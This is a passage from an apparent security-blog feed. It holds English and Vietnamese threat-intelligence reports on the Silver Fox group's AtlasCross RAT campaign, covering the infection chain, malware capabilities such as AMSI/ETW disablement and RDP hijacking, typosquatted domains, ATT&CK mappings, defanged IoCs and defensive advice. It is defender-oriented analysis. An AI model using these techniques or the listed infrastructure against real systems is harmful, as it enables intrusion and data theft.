<p>AtlasCross RAT represents Silver Fox's latest weapons evolution, discovered by Hexastrike in March 2026. It is a more sophisticated variant built on the Gh0st RAT protocol framework — the same lineage as ValleyRAT and Winos 4.0.</p>
<h3>AtlasCross RAT Infection Chain</h3>
<ol>
<li><p>Victim visits a fake website → downloads a ZIP file</p>
</li>
<li><p>ZIP contains a trojanized AutoDesk installer + legitimate decoy application</p>
</li>
<li><p>Trojanized AutoDesk launches a shellcode loader → decrypts embedded Gh0st RAT configuration</p>
</li>
<li><p>Downloads second-stage shellcode from <code>bifa668[.]com</code> over TCP port 9899</p>
</li>
<li><p>Executes <strong>AtlasCross RAT</strong> directly in memory (in-memory execution)</p>
</li>
</ol>
<h3>AtlasCross RAT Technical Capabilities</h3>
<table>
<thead>
<tr>
<th>Feature</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><strong>PowerChell Framework</strong></td>
<td>Native C/C++ PowerShell execution engine hosting .NET CLR inside the malware process</td>
</tr>
<tr>
<td><strong>Security Disablement</strong></td>
<td>Kills AMSI, ETW, Constrained Language Mode, and ScriptBlock Logging</td>
</tr>
<tr>
<td><strong>C2 Encryption</strong></td>
<td>ChaCha20 with random per-packet key, generated via hardware RNG</td>
</tr>
<tr>
<td><strong>DLL Injection</strong></td>
<td>Injects into WeChat process</td>
</tr>
<tr>
<td><strong>RDP Hijacking</strong></td>
<td>Hijacks active RDP sessions</td>
</tr>
<tr>
<td><strong>AV/EDR Blocking</strong></td>
<td>Actively drops TCP connections from 360 Safe, Huorong, Kingsoft, QQ PC Manager</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>Creates Scheduled Task</td>
</tr>
<tr>
<td><strong>File &amp; Shell Ops</strong></td>
<td>Remote file management and shell command execution</td>
</tr>
</tbody></table>
<p>Notably, instead of using the popular <strong>BYOVD (Bring Your Own Vulnerable Driver)</strong> technique, AtlasCross RAT opts to <strong>directly drop TCP connections</strong> to Chinese security software — a more subtle evasion method.</p>
<hr />
<h2>Distribution Infrastructure: 11 Typosquatted Domains</h2>
<p>All 11 AtlasCross RAT distribution domains were registered on the <strong>same date, October 27, 2025</strong>, indicating a high degree of premeditated preparation. The impersonated brands include applications popular within Chinese-speaking communities:</p>
<table>
<thead>
<tr>
<th>Fake Domain</th>
<th>Target Brand</th>
</tr>
</thead>
<tbody><tr>
<td><code>app-zoom.com</code></td>
<td>Zoom</td>
</tr>
<tr>
<td><code>signal-signal.com</code></td>
<td>Signal</td>
</tr>
<tr>
<td><code>telegrtam.com.cn</code></td>
<td>Telegram</td>
</tr>
<tr>
<td><code>www-surfshark.com</code></td>
<td>Surfshark VPN</td>
</tr>
<tr>
<td><code>www-teams.com</code></td>
<td>Microsoft Teams</td>
</tr>
<tr>
<td><code>trezor-trezor.com</code></td>
<td>Trezor (crypto wallet)</td>
</tr>
<tr>
<td><code>ultraviewer-cn.com</code></td>
<td>UltraViewer</td>
</tr>
<tr>
<td><code>quickq-quickq.com</code></td>
<td>QuickQ VPN</td>
</tr>
<tr>
<td><code>kefubao-pc.com</code></td>
<td>KeFuBao (e-commerce)</td>
</tr>
<tr>
<td><code>wwtalk-app.com</code></td>
<td>WangWang</td>
</tr>
<tr>
<td><code>eyy-eyy.com</code></td>
<td>Unknown</td>
</tr>
</tbody></table>
<p>Critically, <strong>all installer packages</strong> carry a stolen <strong>Extended Validation (EV) Code-Signing Certificate</strong> issued to <strong>DUC FABULOUS CO., LTD</strong> — a Vietnamese company registered in Hanoi. This certificate has also appeared in unrelated malware campaigns, suggesting it is being <strong>shared across the criminal ecosystem</strong> to bypass digital signature verification mechanisms.</p>
<hr />
<h2>Target Scope &amp; Geography</h2>
<p>Silver Fox selectively targets by industry and role, focusing particularly on:</p>
<ul>
<li><p><strong>Finance officers, accountants, and compliance personnel</strong> within enterprises</p>
</li>
<li><p><strong>Mid-to-senior level managers</strong> at Southeast Asian organizations</p>
</li>
<li><p><strong>Japanese manufacturers</strong> targeted through spear-phishing lures related to taxes and payroll</p>
</li>
</ul>
<p>Countries targeted from December 2025 onward include: <strong>Japan, Malaysia, Philippines, Thailand, Indonesia, Singapore, India, and Taiwan</strong>. India was targeted through income tax lures bundled with <strong>Blackmoon</strong> malware, documented by eSentire in January 2026.</p>
<hr />
<h2>TTPs Mapped to MITRE ATT&amp;CK Framework</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1566.002 – Spearphishing Link</td>
<td>Fake tax authority emails with embedded links</td>
</tr>
<tr>
<td><strong>Initial Access</strong></td>
<td>T1566.001 – Spearphishing Attachment</td>
<td>Malicious PDF attachments</td>
</tr>
<tr>
<td><strong>Resource Development</strong></td>
<td>T1583.001 – Typosquatting</td>
<td>11 domains impersonating popular software</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1059.001 – PowerShell</td>
<td>PowerChell framework within AtlasCross RAT</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1562.001 – Disable Security Tools</td>
<td>Kills AMSI, ETW, drops Chinese AV connections</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1553.002 – Code Signing</td>
<td>Uses stolen EV certificate</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>T1053.005 – Scheduled Task</td>
<td>Creates auto-start Scheduled Task</td>
</tr>
<tr>
<td><strong>C2</strong></td>
<td>T1573 – Encrypted Channel</td>
<td>ChaCha20 per-packet encryption</td>
</tr>
<tr>
<td><strong>Collection</strong></td>
<td>T1056.001 – Keylogging</td>
<td>ValleyRAT keystroke capture</td>
</tr>
<tr>
<td><strong>Lateral Movement</strong></td>
<td>T1563.002 – RDP Hijacking</td>
<td>AtlasCross RAT hijacks active RDP sessions</td>
</tr>
</tbody></table>
<hr />
<h2>Indicators of Compromise (IoCs)</h2>
<h3>AtlasCross RAT Distribution Domains</h3>
<pre><code class="language-plaintext">app-zoom[.]com | signal-signal[.]com | telegrtam[.]com.cn
www-surfshark[.]com | www-teams[.]com | trezor-trezor[.]com
ultraviewer-cn[.]com | quickq-quickq[.]com | kefubao-pc[.]com
wwtalk-app[.]com | eyy-eyy[.]com
</code></pre>
<h3>C2 Servers</h3>
<pre><code class="language-plaintext">bifa668[.]com (TCP:9899)  — AtlasCross RAT stage 2
xqwmwru[.]top             — Python stealer exfiltration endpoint
9010.360sdgg[.]com        — ValleyRAT C2
</code></pre>
<h3>Python Stealer Endpoints (Wave 3)</h3>
<pre><code class="language-plaintext">https://xqwmwru[.]top/upload_large.php
https://xqwmwru[.]top/upload_status.php
https://xqwmwru[.]top/admin/login.php
</code></pre>
<h3>Phishing Domains (Sekoia Documented)</h3>
<pre><code class="language-plaintext">googlevip[.]icu | oytdwzz[.]shop | gov[.]incometax[.]click
megamovielord[.]com | primetechstocks[.]com | domainCt[.]com
</code></pre>
<p><em>(Full list of 40+ domains available in Sekoia IoC Annex)</em></p>
<hr />
<h2>Strategic Assessment</h2>
<p>Silver Fox is executing a <strong>"dual-track" model</strong> — simultaneously functioning as an APT and a cybercrime group — a trend increasingly observed within China-nexus threat ecosystems. Sekoia assesses this may be a <strong>"moonlighting" arrangement</strong>: a criminal group selling initial access to state-affiliated entities, or being outsourced by a state actor to conduct initial intrusion phases.</p>
<p>The continued use of ValleyRAT even after its <strong>builder was leaked in 2023</strong>, combined with the active development of kernel-mode rootkit plugins, demonstrates that Silver Fox possesses considerable technical resources and has not been disrupted by source code exposure. The emergence of AtlasCross RAT — featuring a dedicated PowerChell framework and ChaCha20 per-packet encryption — is clear evidence of <strong>sustained and continuous weapons development capability</strong>.</p>
<hr />
<h2>Defensive Recommendations</h2>
<p><strong>For SOC / Blue Teams:</strong></p>
<ul>
<li><p>Monitor outbound connections to domains matching the pattern <code>[brand]-[brand].com</code> or <code>www-[brand].com</code></p>
</li>
<li><p>Deploy sandbox analysis for all PDFs and archive files (ZIP/RAR) prior to delivery to end users</p>
</li>
<li><p>Alert on unfamiliar EV code-signing certificates, especially from low-profile or unknown entities</p>
</li>
<li><p>Hunt for PowerShell processes spawned from non-standard parent processes (particularly where AMSI is disabled)</p>
</li>
</ul>
<p><strong>For System Administrators:</strong></p>
<ul>
<li><p>Block TCP connections to <code>bifa668[.]com</code> and <code>xqwmwru[.]top</code> at the perimeter</p>
</li>
<li><p>Audit Scheduled Tasks on all Windows endpoints for anomalous entries</p>
</li>
<li><p>Restrict the use of unapproved RMM tools (particularly SyncFuture TSM) via application allowlisting</p>
</li>
<li><p>Configure WDAC (Windows Defender Application Control) to prevent DLL injection into the WeChat process</p>
</li>
</ul>
<p><strong>For End Users:</strong></p>
<ul>
<li><p>Always download software exclusively from <strong>official vendor websites</strong> — carefully verify the full domain name before downloading</p>
</li>
<li><p>Be suspicious of emails referencing <strong>tax audits, salary adjustments, or stock option grants</strong> that contain attachments or links</p>
</li>
<li><p>Immediately report to IT any email requesting the content be "forwarded to a finance team member"</p>
</li>
</ul>
<hr />
<h2>Conclusion</h2>
<p>Silver Fox is one of the most dynamic and adaptable threat groups currently operating across Asia. With continuous weapons iteration (ValleyRAT → HoldingHands → RMM abuse → Python stealer → AtlasCross RAT), diversified attack vectors, and geographic expansion from China/Taiwan to all of Southeast Asia, the group poses a serious risk to organizations in the region — particularly those in financial services, manufacturing, and organizations relying on popular communication applications. Continuous tracking of this group and ongoing IoC updates are mandatory requirements for any Threat Intelligence program operating within the APAC region.</p>
<hr />
<h2>References</h2>
<ol>
<li><p><a href="https://thehackernews.com/2026/03/silver-fox-expands-asia-cyber-campaign.html">Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains</a></p>
</li>
<li><p><a href="https://blog.darklab.hk/2026/03/25/silver-foxs-dual-pronged-strategy-dissecting-the-valleyrat-distribution-campaign/">Silver Fox’s Dual-Pronged Strategy: Dissecting the ValleyRAT Distribution Campaign</a></p>
</li>
<li><p><a href="https://blog.sekoia.io/silver-fox-the-only-tax-audit-where-the-fine-print-installs-malware/">Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware</a></p>
</li>
<li><p><a href="https://www.infosecurity-magazine.com/news/silver-fox-cyber-dual-espionage/">Silver Fox Cyber Campaigns Show Shift Toward Dual Espionage</a></p>
</li>
<li><p><a href="https://www.welivesecurity.com/en/business-security/cunning-predator-how-silver-fox-preys-japanese-firms-tax-season/">A cunning predator: How Silver Fox preys on Japanese firms this tax season</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Silver Fox — Mở Rộng Chiến Dịch Tấn Công Châu Á với AtlasCross RAT và Hạ Tầng Giả Mạo]]></title><description><![CDATA[Tổng Quan
Nhóm đe dọa Silver Fox — một tác nhân tấn công mạng nói tiếng Trung — đang đẩy mạnh các chiến dịch tấn công có chủ đích nhắm vào người dùng và tổ chức tại khu vực châu Á – Thái Bình Dương. T]]></description><link>https://blog.fiscybersec.com/silver-fox-m-r-ng-chi-n-d-ch-t-n-c-ng-ch-u-v-i-atlascross-rat-v-h-t-ng-gi-m-o</link><guid isPermaLink="true">https://blog.fiscybersec.com/silver-fox-m-r-ng-chi-n-d-ch-t-n-c-ng-ch-u-v-i-atlascross-rat-v-h-t-ng-gi-m-o</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[silver fox]]></category><category><![CDATA[campaign]]></category><category><![CDATA[AtlasCross RAT]]></category><category><![CDATA[Fake Domains]]></category><dc:creator><![CDATA[Đinh Văn Mạnh]]></dc:creator><pubDate>Sun, 05 Apr 2026 02:12:42 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/bdf6925b-92fb-4ada-b95a-de3561209606.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Tổng Quan</h2>
<p>Nhóm đe dọa <strong>Silver Fox</strong> — một tác nhân tấn công mạng nói tiếng Trung — đang đẩy mạnh các chiến dịch tấn công có chủ đích nhắm vào người dùng và tổ chức tại khu vực châu Á – Thái Bình Dương. Theo báo cáo của Hexastrike (Đức) công bố cuối tháng 3/2026, chiến dịch mới nhất triển khai một trojan truy cập từ xa chưa từng được ghi nhận trước đây mang tên <strong>AtlasCross RAT</strong>, phân phối qua 11 tên miền giả mạo được đăng ký cùng một ngày — 27/10/2025. Song song đó, Sekoia (Pháp) xác nhận nhóm này đang duy trì mô hình "hai mũi tên": vừa thực hiện các chiến dịch gián điệp kiểu APT, vừa tiếp tục các hoạt động tội phạm mạng vì lợi nhuận trải dài khắp Nam Á và Đông Nam Á.</p>
<hr />
<h2>Hồ Sơ Tác Nhân</h2>
<p>Silver Fox là một nhóm tội phạm mạng/APT có nguồn gốc từ Trung Quốc, hoạt động ít nhất từ năm 2022. Nhóm được theo dõi dưới nhiều tên gọi khác nhau:</p>
<table>
<thead>
<tr>
<th>Alias</th>
<th>Nguồn theo dõi</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Silver Fox</strong></td>
<td>Hexastrike, Sekoia</td>
</tr>
<tr>
<td><strong>Void Arachne</strong></td>
<td>Trend Micro</td>
</tr>
<tr>
<td><strong>UTG-Q-1000</strong></td>
<td>Các nhà nghiên cứu Trung Quốc</td>
</tr>
<tr>
<td><strong>The Great Thief of Valley / Valley Thief</strong></td>
<td>Knownsec 404</td>
</tr>
</tbody></table>
<p>Theo Knownsec 404, Silver Fox được xếp vào danh sách <strong>"mối đe dọa mạng hoạt động tích cực nhất"</strong> trong những năm gần đây, chủ yếu nhắm vào nhân sự quản lý cấp cao và bộ phận tài chính tại các doanh nghiệp. Kể từ năm 2024, nhóm bắt đầu chuyển dịch sang các chiến dịch mang tính chất gián điệp có tổ chức bên cạnh mục tiêu tài chính truyền thống.</p>
<hr />
<h2>Diễn Biến Chiến Dịch (2025–2026): Ba Làn Sóng Tấn Công</h2>
<h3>Làn sóng 1 — Nhắm vào Đài Loan (Đầu 2025)</h3>
<p>Từ ít nhất tháng 1/2025, Silver Fox triển khai chiến dịch phishing giả mạo cơ quan thuế quốc gia Đài Loan, lợi dụng đúng thời điểm công bố danh sách doanh nghiệp bị kiểm tra thuế. Email lừa đảo đính kèm file PDF chứa mã độc; khi nạn nhân nhấp vào nội dung trong file, chuỗi lây nhiễm kích hoạt và triển khai <strong>ValleyRAT</strong> thông qua DLL side-loading.</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/58349d7b-3205-421b-a5ea-df376e61dc6c.png" alt="" style="display:block;margin:0 auto" />

<p>Chuỗi lây nhiễm cụ thể:</p>
<ol>
<li><p>Email phishing → đính kèm PDF giả mạo Bộ Tài chính Đài Loan</p>
</li>
<li><p>PDF chứa vùng nhấp ẩn (<code>/Annot</code>) dẫn đến tải ZIP từ hạ tầng <strong>myqcloud</strong></p>
</li>
<li><p>ZIP chứa <code>python311.dll</code> (shellcode loader) + <code>查看10.exe</code></p>
</li>
<li><p>Thực thi <strong>ValleyRAT</strong>, cấu hình tải từ <code>C:\users\public\download\bb.jpg</code></p>
</li>
<li><p>Kết nối C2: <code>9010.360sdgg[.]com</code></p>
</li>
</ol>
<p>Đến tháng 4/2025, Fortinet xác nhận chiến dịch mở rộng sang <strong>Nhật Bản</strong>.</p>
<h3>Làn sóng 2 — Lạm dụng RMM Tool (Cuối 2025)</h3>
<p>Từ giữa tháng 12/2025, Silver Fox chuyển sang phân phối công cụ <strong>SyncFuture TSM</strong> — một phần mềm quản trị từ xa (RMM) hợp pháp của Trung Quốc nhưng bị cấu hình sai. Kẻ tấn công khai thác lỗ hổng xử lý cấu hình để nhúng địa chỉ C2 trực tiếp vào <strong>tên file</strong> (<code>[ipv4]ClientSetup.exe</code>), do đó không làm thay đổi chữ ký số của file. Chiến dịch này mở rộng sang <strong>Malaysia, Philippines, Thái Lan, Indonesia, Singapore và Ấn Độ</strong>.</p>
<h3>Làn sóng 3 — Python Stealer giả mạo WhatsApp (Đầu 2026)</h3>
<p>Tháng 2/2026, Silver Fox thay thế RMM tool bằng một <strong>Python stealer tùy chỉnh</strong> được ngụy trang dưới dạng ứng dụng WhatsApp, nhắm chủ yếu vào Malaysia. Công cụ này thu thập thông tin đăng nhập, tài liệu nhạy cảm và tải lên C2 tại <code>xqwmwru[.]top</code>, để lại các artifact đặc trưng:</p>
<ul>
<li><p><code>C:\WhatsAppBackup\WhatsAppData.zip</code></p>
</li>
<li><p><code>%TEMP%\whatsapp_backup.lock</code></p>
</li>
<li><p>User-Agent giả mạo: <code>WhatsAppBackup/1.0</code></p>
</li>
</ul>
<hr />
<h2>Vũ Khí Mới Nhất: AtlasCross RAT</h2>
<p>AtlasCross RAT là bước tiến hóa mới nhất trong kho vũ khí của Silver Fox, được phát hiện bởi Hexastrike vào tháng 3/2026. Đây là biến thể tinh vi hơn, xây dựng trên nền tảng giao thức Gh0st RAT (cùng dòng với ValleyRAT và Winos 4.0).</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/88acee53-30ec-48ca-9193-7eaa0f0a1524.png" alt="" style="display:block;margin:0 auto" />

<h3>Chuỗi lây nhiễm AtlasCross RAT</h3>
<ol>
<li><p>Nạn nhân truy cập website giả mạo → tải file ZIP</p>
</li>
<li><p>ZIP chứa installer AutoDesk bị trojan hóa + ứng dụng hợp pháp giả mồi</p>
</li>
<li><p>AutoDesk trojanized khởi chạy shellcode loader → giải mã cấu hình Gh0st RAT nhúng sẵn</p>
</li>
<li><p>Tải second-stage shellcode từ <code>bifa668[.]com</code> qua TCP port 9899</p>
</li>
<li><p>Thực thi <strong>AtlasCross RAT</strong> trực tiếp trong bộ nhớ (in-memory execution)</p>
</li>
</ol>
<h3>Năng lực kỹ thuật của AtlasCross RAT</h3>
<table>
<thead>
<tr>
<th>Tính năng</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><strong>PowerChell Framework</strong></td>
<td>Engine thực thi PowerShell native C/C++, host .NET CLR trong tiến trình malware</td>
</tr>
<tr>
<td><strong>Vô hiệu hóa bảo mật</strong></td>
<td>Tắt AMSI, ETW, Constrained Language Mode và ScriptBlock Logging</td>
</tr>
<tr>
<td><strong>Mã hóa C2</strong></td>
<td>ChaCha20 với khóa ngẫu nhiên mỗi gói tin, sinh bằng hardware RNG</td>
</tr>
<tr>
<td><strong>DLL Injection</strong></td>
<td>Chèn vào tiến trình WeChat</td>
</tr>
<tr>
<td><strong>RDP Hijacking</strong></td>
<td>Chiếm quyền phiên RDP đang hoạt động</td>
</tr>
<tr>
<td><strong>Chặn AV/EDR</strong></td>
<td>Chủ động ngắt kết nối TCP từ 360 Safe, Huorong, Kingsoft, QQ PC Manager</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>Tạo Scheduled Task</td>
</tr>
<tr>
<td><strong>File &amp; Shell Ops</strong></td>
<td>Quản lý file, thực thi lệnh shell từ xa</td>
</tr>
</tbody></table>
<p>Đặc biệt, thay vì dùng kỹ thuật <strong>BYOVD (Bring Your Own Vulnerable Driver)</strong> phổ biến, AtlasCross RAT chọn cách <strong>ngắt kết nối TCP trực tiếp</strong> với các phần mềm bảo mật của Trung Quốc — một phương pháp né tránh phát hiện tinh tế hơn.</p>
<hr />
<h2>Hạ Tầng Phân Phối: 11 Tên Miền Typosquat</h2>
<p>Toàn bộ 11 tên miền phân phối AtlasCross RAT được đăng ký <strong>cùng ngày 27/10/2025</strong>, chỉ ra mức độ chuẩn bị có chủ đích cao. Các thương hiệu bị giả mạo bao gồm các ứng dụng phổ biến trong cộng đồng nói tiếng Trung:</p>
<table>
<thead>
<tr>
<th>Tên miền giả mạo</th>
<th>Thương hiệu mục tiêu</th>
</tr>
</thead>
<tbody><tr>
<td><code>app-zoom.com</code></td>
<td>Zoom</td>
</tr>
<tr>
<td><code>signal-signal.com</code></td>
<td>Signal</td>
</tr>
<tr>
<td><code>telegrtam.com.cn</code></td>
<td>Telegram</td>
</tr>
<tr>
<td><code>www-surfshark.com</code></td>
<td>Surfshark VPN</td>
</tr>
<tr>
<td><code>www-teams.com</code></td>
<td>Microsoft Teams</td>
</tr>
<tr>
<td><code>trezor-trezor.com</code></td>
<td>Trezor (ví crypto)</td>
</tr>
<tr>
<td><code>ultraviewer-cn.com</code></td>
<td>UltraViewer</td>
</tr>
<tr>
<td><code>quickq-quickq.com</code></td>
<td>QuickQ VPN</td>
</tr>
<tr>
<td><code>kefubao-pc.com</code></td>
<td>KeFuBao (e-commerce)</td>
</tr>
<tr>
<td><code>wwtalk-app.com</code></td>
<td>WangWang</td>
</tr>
<tr>
<td><code>eyy-eyy.com</code></td>
<td>Không rõ</td>
</tr>
</tbody></table>
<p>Đáng chú ý, <strong>toàn bộ các gói installer</strong> đều mang chữ ký <strong>Extended Validation (EV) Code-Signing Certificate</strong> bị đánh cắp từ công ty <strong>DUC FABULOUS CO., LTD</strong> — một doanh nghiệp Việt Nam đăng ký tại Hà Nội. Chứng chỉ này cũng xuất hiện trong các chiến dịch malware không liên quan khác, cho thấy nó đang được <strong>chia sẻ rộng rãi trong hệ sinh thái tội phạm mạng</strong> nhằm qua mặt cơ chế kiểm tra chữ ký số.</p>
<hr />
<h2>Mục Tiêu &amp; Phạm Vi Địa Lý</h2>
<p>Silver Fox tấn công có chọn lọc theo ngành và vai trò, đặc biệt là:</p>
<ul>
<li><p><strong>Cán bộ tài chính, kế toán, tuân thủ (compliance)</strong> trong doanh nghiệp</p>
</li>
<li><p><strong>Nhà quản lý cấp trung và cao</strong> tại các tổ chức Đông Nam Á</p>
</li>
<li><p><strong>Nhà sản xuất Nhật Bản</strong> qua chiến dịch spear-phishing về thuế và lương</p>
</li>
</ul>
<p>Các quốc gia bị nhắm mục tiêu từ tháng 12/2025 đến nay bao gồm: <strong>Nhật Bản, Malaysia, Philippines, Thái Lan, Indonesia, Singapore, Ấn Độ và Đài Loan</strong>. Ấn Độ bị tấn công qua lure về thuế thu nhập kèm malware <strong>Blackmoon</strong>, được eSentire ghi nhận vào tháng 1/2026.</p>
<hr />
<h2>TTPs Theo Framework MITRE ATT&amp;CK</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1566.002 – Spearphishing Link</td>
<td>Email giả mạo cơ quan thuế</td>
</tr>
<tr>
<td><strong>Initial Access</strong></td>
<td>T1566.001 – Spearphishing Attachment</td>
<td>PDF độc hại đính kèm</td>
</tr>
<tr>
<td><strong>Resource Development</strong></td>
<td>T1583.001 – Typosquatting</td>
<td>11 domain giả mạo phần mềm phổ biến</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1059.001 – PowerShell</td>
<td>PowerChell framework trong AtlasCross RAT</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1562.001 – Disable Security Tools</td>
<td>Tắt AMSI, ETW, ngắt kết nối AV Trung Quốc</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1553.002 – Code Signing</td>
<td>Sử dụng chứng chỉ EV đánh cắp</td>
</tr>
<tr>
<td><strong>Persistence</strong></td>
<td>T1053.005 – Scheduled Task</td>
<td>Tạo Scheduled Task tự khởi động</td>
</tr>
<tr>
<td><strong>C2</strong></td>
<td>T1573 – Encrypted Channel</td>
<td>ChaCha20 per-packet encryption</td>
</tr>
<tr>
<td><strong>Collection</strong></td>
<td>T1056.001 – Keylogging</td>
<td>ValleyRAT keystroke logging</td>
</tr>
<tr>
<td><strong>Lateral Movement</strong></td>
<td>T1563.002 – RDP Hijacking</td>
<td>AtlasCross RAT chiếm phiên RDP</td>
</tr>
</tbody></table>
<hr />
<h2>Indicators of Compromise (IoCs)</h2>
<h3>Tên miền phân phối AtlasCross RAT</h3>
<pre><code class="language-plaintext">app-zoom[.]com | signal-signal[.]com | telegrtam[.]com.cn
www-surfshark[.]com | www-teams[.]com | trezor-trezor[.]com
ultraviewer-cn[.]com | quickq-quickq[.]com | kefubao-pc[.]com
wwtalk-app[.]com | eyy-eyy[.]com
</code></pre>
<h3>C2 Server</h3>
<pre><code class="language-plaintext">bifa668[.]com (TCP:9899) — AtlasCross RAT stage 2
xqwmwru[.]top — Python stealer exfiltration
9010.360sdgg[.]com — ValleyRAT C2
</code></pre>
<h3>Python Stealer (Wave 3)</h3>
<pre><code class="language-plaintext">https://xqwmwru[.]top/upload_large.php
https://xqwmwru[.]top/upload_status.php
https://xqwmwru[.]top/admin/login.php
</code></pre>
<h3>Phishing domains (Silver Fox campaign – Sekoia)</h3>
<pre><code class="language-plaintext">googlevip[.]icu | oytdwzz[.]shop | gov[.]incometax[.]click
megamovielord[.]com | primetechstocks[.]com | domainCt[.]com
</code></pre>
<p><em>(Danh sách đầy đủ 40+ domain tại Sekoia IoC Annex)</em></p>
<hr />
<h2>Đánh Giá Chiến Lược</h2>
<p>Silver Fox đang thực hiện mô hình <strong>"dual-track"</strong> — vừa APT vừa tội phạm mạng — một xu hướng ngày càng phổ biến trong hệ sinh thái tấn công mạng Trung Quốc. Sekoia nhận định đây có thể là mô hình <strong>"moonlighting"</strong>: một nhóm tội phạm mạng bán quyền truy cập cho các cơ quan nhà nước hoặc được thuê ngoài bởi một tác nhân nhà nước để thực hiện các giai đoạn xâm nhập ban đầu.</p>
<p>Việc Silver Fox tiếp tục dùng ValleyRAT ngay cả sau khi <strong>builder bị rò rỉ năm 2023</strong> và liên tục phát triển plugin kernel-mode rootkit cho thấy nhóm này có nguồn lực kỹ thuật đáng kể, không bị gián đoạn bởi việc lộ mã nguồn. Sự xuất hiện của AtlasCross RAT với PowerChell framework và ChaCha20 encryption là bằng chứng rõ ràng về <strong>khả năng nâng cấp vũ khí liên tục</strong>.</p>
<hr />
<h2>Khuyến Nghị Phòng Thủ</h2>
<p><strong>Dành cho SOC / Blue Team:</strong></p>
<ul>
<li><p>Giám sát các kết nối đến domain có cấu trúc <code>[brand]-[brand].com</code> hoặc <code>www-[brand].com</code></p>
</li>
<li><p>Triển khai sandbox phân tích PDF và file nén (ZIP/RAR) trước khi mở</p>
</li>
<li><p>Cảnh báo với các EV code-signing certificate không quen thuộc, đặc biệt từ các thực thể ít tên tuổi</p>
</li>
<li><p>Săn tìm tiến trình PowerShell được gọi từ tiến trình không hợp lệ (AMSI disabled)</p>
</li>
</ul>
<p><strong>Dành cho quản trị viên hệ thống:</strong></p>
<ul>
<li><p>Chặn các kết nối TCP đến <code>bifa668[.]com</code> và <code>xqwmwru[.]top</code></p>
</li>
<li><p>Kiểm tra Scheduled Tasks bất thường trên các máy Windows trong tổ chức</p>
</li>
<li><p>Hạn chế việc sử dụng RMM tools từ các nhà cung cấp không được phê duyệt (đặc biệt SyncFuture TSM)</p>
</li>
<li><p>Cấu hình WDAC (Windows Defender Application Control) để ngăn DLL injection vào WeChat</p>
</li>
</ul>
<p><strong>Dành cho người dùng:</strong></p>
<ul>
<li><p>Luôn tải phần mềm từ <strong>website chính thức</strong> — kiểm tra kỹ tên miền trước khi tải</p>
</li>
<li><p>Nghi ngờ các email về <strong>kiểm tra thuế, điều chỉnh lương, quyền chọn cổ phiếu</strong> có đính kèm file hoặc link</p>
</li>
<li><p>Báo cáo ngay bộ phận IT khi nhận email yêu cầu "chuyển cho nhân viên tài chính"</p>
</li>
</ul>
<hr />
<h2>Kết Luận</h2>
<p>Silver Fox là một trong những nhóm đe dọa năng động và linh hoạt nhất trong khu vực châu Á hiện nay. Với việc liên tục cập nhật vũ khí (ValleyRAT → HoldingHands → RMM abuse → Python stealer → AtlasCross RAT), đa dạng hóa vector tấn công và mở rộng địa bàn từ Trung Quốc/Đài Loan sang toàn bộ Đông Nam Á, nhóm này đặt ra rủi ro nghiêm trọng cho các tổ chức trong khu vực — đặc biệt là các doanh nghiệp tài chính, sản xuất và các đơn vị đang sử dụng các ứng dụng liên lạc phổ biến. Việc theo dõi liên tục nhóm này và cập nhật IoC là yêu cầu bắt buộc với bất kỳ chương trình Threat Intelligence nào tại khu vực APAC.</p>
<hr />
<h2>Tham Khảo</h2>
<ol>
<li><p><a href="https://thehackernews.com/2026/03/silver-fox-expands-asia-cyber-campaign.html">Silver Fox Expands Asia Cyber Campaign with AtlasCross RAT and Fake Domains</a></p>
</li>
<li><p><a href="https://blog.darklab.hk/2026/03/25/silver-foxs-dual-pronged-strategy-dissecting-the-valleyrat-distribution-campaign/">Silver Fox’s Dual-Pronged Strategy: Dissecting the ValleyRAT Distribution Campaign</a></p>
</li>
<li><p><a href="https://blog.sekoia.io/silver-fox-the-only-tax-audit-where-the-fine-print-installs-malware/">Silver Fox: The Only Tax Audit Where the Fine Print Installs Malware</a></p>
</li>
<li><p><a href="https://www.infosecurity-magazine.com/news/silver-fox-cyber-dual-espionage/">Silver Fox Cyber Campaigns Show Shift Toward Dual Espionage</a></p>
</li>
<li><p><a href="https://www.welivesecurity.com/en/business-security/cunning-predator-how-silver-fox-preys-japanese-firms-tax-season/">A cunning predator: How Silver Fox preys on Japanese firms this tax season</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Bạn chính là “lỗ hổng bảo mật”: ClickFix đang khiến người dùng tự cài malware]]></title><description><![CDATA[Tổng quan
